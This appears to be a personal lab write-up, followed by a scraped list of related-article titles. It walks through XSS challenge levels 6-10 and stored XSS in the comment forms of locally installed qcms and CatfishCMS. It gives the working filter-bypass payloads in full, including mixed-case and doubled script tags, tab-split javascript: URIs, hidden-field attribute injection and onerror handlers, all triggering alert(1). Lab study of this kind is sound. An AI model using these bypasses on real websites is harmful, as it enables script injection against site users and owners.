0x01 xss challenge level 6-10

1.1 level 6

test with typical, notice the script has changed

change script to 'Script', and enclose double quote, bingo

http://n00p.me/xss/level6.php?keyword="><sCript>alert(1)</script> <" &submit

1.2 level 7

test with typical

after these not worked: script to 'Script';

finally, double write script to scrscriptipt, and enclose double quote, bingo:

http://n00p.me/xss/level7.php?keyword="><scrscriptipt>alert(1)</scrscriptipt><"&submit

1.3 level 8

try1, test typical, find two exp-point

try2, enclose the quote

http://n00p.me/xss/level6.php?keyword=<script>alert(1)</script> &submit

as source code , guess htmlspecialchars was used

<input name=keyword  value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;&quot;     ">

try3, move target to next exp-point

http://n00p.me/xss/level8.php?keyword=javascript:alert(1) &submit

http://n00p.me/xss/level8.php?keyword=javaScript:alert(1) &submit

http://n00p.me/xss/level8.php?keyword=javas cript:alert(1) &submit(blank is char-tab, if type this in address bar or hack bar, tab will be chopped. it's concluded by burp suite )

each result:

<a href="javascr_ipt:alert(1)     ">友情链接</a>

<a href="javascr_ipt:alert(1)     ">友情链接</a>

<a href="javascr_ipt:alert(1)     ">友情链接</a>

try4, consider type tab in inputbox ,bingo(intercept by burp, notice char-tab in input box was url-encoded, this differs from address bars, now we can use %09 in address bar to achieve real tab like input-box )

1.4 level 9

try1, use typical as previous, and find this:

<a href="您的链接不合法?有没有!">友情链接</a>

try2, try a valid-like link, works fine

http://n00p.me/xss/level9.php?keyword=http://n00p.me&submit

<a href="http://n00p.me">友情链接</a>

try3, after a few test, http:// is the core string that must include in payload, or it will throw try1, so we just include this string, as level 8, bingo

http://n00p.me/xss/level9.php?keyword=javas%09cript:alert('http://') &submit

1.5 level 10

try1, use typical, and found exp-like in burp's response:

<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2>

try2, from try1, predefined characters(less than sign< and greater than sign>) has been converted to HTML entities(<>), does it means that we could do nothing about this? Focus the rest html code and notice these:

<form id=search>

<input name="t_link"  value="" type="hidden">

<input name="t_history"  value="" type="hidden">

<input name="t_sort"  value="" type="hidden">

</form>

try3, there is a form including 3 input tags in it. The form method is not defined but default to GET. It means that we can directly build url instead of change html element to detect form exp-points. Build url like this and check is there anything to exploit:

http://n00p.me/xss/level10.php?keyword=aaa&t_link=bbb&t_history=ccc&t_sort=ddd

try4, dada! after we enter the payload above, we found exp-like in response html as below:

<form id="search">

<input name="t_link" value="" type="hidden">

<input name="t_history" value="" type="hidden">

<input name="t_sort" value="ddd" type="hidden">

</form>

try5, enclose the t_sort input, bingo:

http://n00p.me/xss/level10.php?keyword=aaa&t_link=bbb&t_history=ccc&t_sort=d" onclick=alert(1) type="text

why the input use text type instead of hidden type? Explaination see referer link:

What happens in practice is that the latter attribute is ignored

Notice that it is reverse to css selector .

But both duplicate attribute and duplicate css selector are not recommended in production enviroment!

0x02 qcms

2.1 switch php version to 5.2

2.2 bind the site root to 8080 port

2.3 type http://n00p.me:8080 in adress bar, input db-config-info, install, after complete, find 留言 page:

2.4 try typical in textbox, bingo!

0x03 CatfishCMS

3.1 switch php version to 5.5

3.2 open http://n00p.me/catfish, install, register an account, login and click one post, find "留言" as below:



3.3 use typical and submit, notice response that maybe used htmlspecialchars() in php code :

<p><p>&lt;script&gt;alert(1)&lt;/script&gt;</p></p>

3.4 pull out burp and detect exp-point, find this:

pinglun=%3Cp%3E%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B%3C%2Fp%3E

apparently, it has been url encoded, decode it:

pinglun=<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>

the code has been converted before send to server, what about change it to its raw face like below?

pinglun=<p><script>alert(1)</script></p>

forwarded above, comment was succeed to post but nothing was leaved in comment content part. Guess server has filtered script string, use below payload instead, bingo:

pinglun=<p><script>alert(1)</script></p>

3.5 alternative payloads

  • pinglun=<img src=x onerror=alert(1)>
  • pinglun=<p onmouseover=alert(12121212)>aa</p>

0x04 summary about cms sites depolyment

  1. reading cms-followed doc is essential, it has valued info to deploy OK
  2. if install-like.page report errors, try change php version
  3. some cms restricts path to www dir, use phpstudy sites_domain_control option can handle this
  4. to deploy a cms site is not difficult, just need some patient and it will work properly

xss part2的更多相关文章

  1. 漏洞科普:对于XSS和CSRF你究竟了解多少

    转自:http://www.freebuf.com/articles/web/39234.html 随着Web2.0.社交网络.微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广 ...

  2. 利用窗口引用漏洞和XSS漏洞实现浏览器劫持

    ==Ph4nt0m Security Team==                        Issue 0x03, Phile #0x05 of 0x07 |=----------------- ...

  3. 网络XSS攻击和CSRF攻击原理及防范

    网络XSS攻击和CSRF攻击原理及防范 原文地址:http://www.freebuf.com/articles/web/39234.html 随着Web2.0.社交网络.微博等等一系列新型的互联网产 ...

  4. 转:XSS和CSRF原理及防范

    原文地址:http://www.freebuf.com/articles/web/39234.html 随着Web2.0.社交网络.微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来 ...

  5. WEB安全----XSS和CSRF

    随着Web2.0.社交网络.微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵 ...

  6. 防御XSS攻击-encode用户输入内容的重要性

    一.开场先科普下XSS 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶 ...

  7. XSS

    XSS的含义 XSS(Cross Site Scripting)即跨站脚本.跨站的主要内容是在脚本上. 跨站脚本 跨站脚本的跨,体现了浏览器的特性,可以跨域.所以也就给远程代码或者第三方域上的代码提供 ...

  8. 【XSS】延长 XSS 生命期

    XSS 的本质仍是一段脚本.和其他文档元素一样,页面关了一切都销毁.除非能将脚本蔓延到页面以外的地方,那样才能获得更长的生命力. 庆幸的是,从 DOM 诞生的那一天起,就已为我们准备了这个特殊的功能, ...

  9. 探索ASP.NET MVC5系列之~~~2.视图篇(上)---包含XSS防御和异步分部视图的处理

    其实任何资料里面的任何知识点都无所谓,都是不重要的,重要的是学习方法,自行摸索的过程(不妥之处欢迎指正) 汇总:http://www.cnblogs.com/dunitian/p/4822808.ht ...

随机推荐

  1. DSS分发压力实验

    DSS分发压力实验 昨天为验证依托DSS搭建流媒体直播监控系统的可行性,及确定实时流画面出现严重花屏的原因,做了一个压力实验. 网络拓扑如图: 1.DVR上配置4路视频(CIF / 25fps / 1 ...

  2. 无法登录到Windows云服务器怎么办?

    当您的云服务器无法远程登录时,我们首先建议您使用VNC方式登录. 是否可以通过控制台远程登录 远程登录失败时,请首先尝试能否通过管理控制台,使用VNC方式登录弹性云服务器. 登录管理控制台. 选择“计 ...

  3. nginx反向代理本地 两台web负载均衡 使用ip+端口代理

    环境: 本地外网ip:123.58.251.166 .配置index.html网页 [root@host---- conf.d]# cat /web/sing/index.html <h1> ...

  4. linux扩展根目录空间

    转自:http://blog.chinaunix.net/uid-363820-id-2181838.html Linux用户如何扩展磁盘空间? 这里以B型VPS为例,说明磁盘空间的具体扩展方法如下: ...

  5. C#程序 界面显示运行信息

    1.使用RichTextBox,难免要在多线程调用,所以需要委托. Color定义此条信息用什么颜色显示.可以不同的颜色显示不同的信息. private void ShowMsg(Color colo ...

  6. webdriervAPI(警告框处理)

    from  selenium  import  webdriver driver  =  webdriver.Chorme() driver.get("http://www.baidu.co ...

  7. selenium3 web自动化测试框架 五: 数据驱动简介及基础使用

    1.数据驱动概述 相同的测试脚本使用不同的测试数据来执行,测试数据和测试行为完全分离,这样的测试脚本设计模式称为数据驱动.简单的理解为数据的改变从而驱动自动化测试的执行,最终引起测试结果的改变.通过使 ...

  8. 【SQL】在数据库中发起http请求的小改进

    市面上常见的是用MSXML2.ServerXMLHTTP这个类,但这个类在发起异步请求时并不可靠,就是当send后并不一定会发出这个请求.这里推荐改用Microsoft.XMLHTTP,如果只是简单的 ...

  9. 78 leetCode 位运算解法

    按照自己的理解题目,数组内所有的组合:假如[1,2,3,4]看成1111到0000里面的排列组合,取位运算. vector<vector > subsets(vector&nums ...

  10. window环境下zookeeper的安装(自用---仅供参考)

    转自: https://www.cnblogs.com/ysw-go/p/11396343.html 第一部分:单机模式 1)下载地址:http://www.pirbot.com/mirrors/ap ...